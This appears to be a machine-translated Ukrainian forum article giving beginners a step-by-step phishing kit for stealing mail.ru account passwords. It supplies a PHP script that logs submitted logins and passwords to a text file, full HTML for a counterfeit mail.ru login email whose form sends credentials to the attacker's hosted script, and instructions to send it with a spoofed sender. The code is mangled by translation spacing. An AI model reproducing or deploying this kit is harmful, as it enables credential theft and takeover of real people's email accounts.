Злом пошти на mail.ru [СІ]
Вітання! У цій статті я буду розповідати про те, як зламати поштову скриньку на безкоштовному поштовому сервісі mail.ru.
Стаття призначена для новачків, в СІ, а також для будь-якого користувача інтернету, має бажання отримати доступ до чужого акаунту.
Але ладно не буду про це довго писати і так зрозуміло "навіщо нужнен поштову скриньку зломщикові, самі зрозумієте.
Стаття згодиться для новачків.
Гуру прохання не читати
Для початку нам знадобиться безкоштовний (краще платний) хостинг з підтримкою PHP.
* Тільки заздалегідь переконаєтеся що хостинг підтримує PHP
Можна зареєструватися на будь-якому з цих:
nextmail.ru hobby.ru webrise.ru lapin.ru free.dl-hosting.ru hostow.net beplaced.ru 777host.ru paltus.ru miraclehost.ru freebox.ru alfaspace.net k70.ru hosting.promostudio.ru chat.ru maxhost.ru nixup.com e2e.ru noka.ru newmail.ru boom.ru h15.ru hut.ru jino-net.ru pochta.ru unlimhost.ru onepage.ru by.ru sbn.bz yard.ru domainhosting.ru orthodoxy.ru webservis.ru ru-web.net activehost.ru househost.ru bestof.ru addr.ru hosting.dump.ru pesni.ru medbox.ru fatal.ru x5x.ru hopshot.com 5gigs.com wagoo.com orgfree.com awardspace.com bobos.ca www.host.sk zportal.info spaceall.de 3x.ro sretenie.ru dotgeek.org sevhosting.net o2g.net www.jino-net.ru www.nixup.com newmail.ru ho.com.ua wallSt.ru hut.ru holm.ru e2e.ru fatal.ru host.sk ut.ru H1.ru Hostmos.ru Webm.ru Rdcom.ru narod.ru front.ru nm.ru chat.ru boom.ru by.ru
Зареєстрували? - йдемо далі!
Що нам потрібно?
По-перше нам потрібен сниффер (це скрипт, який дозволяє зберігати дані, що приймаються в текстовий файл).
PHP Код:
<? php $ f = fopen ( "mail.txt", "at"); # Файл куди зберігати flock ($ f, 2); fputs ($ f, $ _GET [ 'Login']. "@"); # логін fputs ($ f, $ _GET [ 'Domain']); # домен fputs ($ f, ";". $ _GET [ 'Password']. "\ n"); # Пароль flock ($ f, 3); fclose ($ f); ?> <Script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>
Розглянемо скрипт детальніше.
PHP Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script> Це рядок визначає, то місце, куди ми будемо перенаправляти користувача після авторизації на листі-фейк.
- Збережемо в файл mes.php і заллємо на хостинг.
- Також створимо в Директорії з скриптом файл mail.txt, і виставимо на нього права (chmod) 777.
Мабуть з хостингом - все!
Приступимо до самого листа, яке ми будемо відправляти жертві на мило.
Код Листи:
<Table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%"> <tr> <Td id = aj_body> <Div id = let_body> <base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"> <Table cellpadding = 0 cellspacing = 0 border = 0 class = login> <Tr> <Td> Користувач відправив вам приховане лист. <Br> Для перегляду листи введіть ваш логін і пароль. <Br> </ a> </ p> </ td> </ Tr> </ Table> <font color = 00; 33; 66 FACE = "Arial"> <H4> Авторизація </ h4> </ Font> <Table cellpadding = 0 cellspacing = 0 border = 0 class = login> <Form method = "GET" action = "http: //адресссайта/mes.php"> <Input type = "hidden" name = "mail" value = "1"> <Tr> <Td width = 75> <Img src = http: //img.mail.ru/0.gif height = 1> <br> Ім'я </ Td> <Td width = 150> <Input type = "text" name = "Login"> </ Td> <Td width = 75> <Select name = "Domain"> <Option value = "mail.ru" SELECTED> @ mail. ru </ option> <Option value = "inbox.ru"> @ inbox. ru </ option> <Option value = "list.ru"> @list. ru </ option> <Option value = "bk.ru"> @ bk. ru </ option> </ Select> </ Td> </ Tr> <Tr> <Td> пароль </ Td> <Td> <Input type = "password" name = "Password"> </ Td> <Td> <A href = "http://www.mail.ru/pages/help/92.html" target = _new> Забули пароль? </ A> </ Td> </ Tr> <Tr> <Td> </ td> <Td> <Input type = checkbox name = "level" value = 1 id = "alien"> <label for = "alien"> Чужий комп'ютер </ label> </ Td> <Td> </ td> </ Tr> <Tr> <Td> </ td> <Td> <Input type = "Submit" value = "Увійти" xstyle = "margin-top: 4px"> </ Td> <Td> </ td> </ Tr> </ form> </ Table> <br> <br> Щоб детальніше дізнатися про послуги - відвідайте <a href = "http://corp.mail.ru" target = "_blank"> Corp. Mail. Ru </ a> <br> Дiяльнiсть нацiональної пошти <a href = "http://www.mail.ru" target = "_blank"> @ Mail. ru </ a> - найкраща безкоштовна пошта. <Base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"> </ div>
Вкажіть в параметрі action тега form - адреса вашого сайту (який ви зареєстрували вище) і шлях до сніффером mes.php.
[!] Треба звернути увагу що дані повинні передовалась методом "GET"! Інакше нічого не вийде.
Тепер залишається відправити жертві лист, бажано з підміною адреси.
Копіюємо код письма в поле для введення і відправляємо в форматі html, попередньо заповнивши поля.
Якщо жертва клюне на це, значить вам пощастило
Дізнатися паролі ви зможете в файлі mail.txt.
Думаю все.
А вже як підійти до злому вирішувати вам.
Дякую за увагу!
Чекаю ваших відгуків трохи нижче цього тексту.
А краще вже нічого і нікого не ламати;)
До побачення і до зустрічі
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.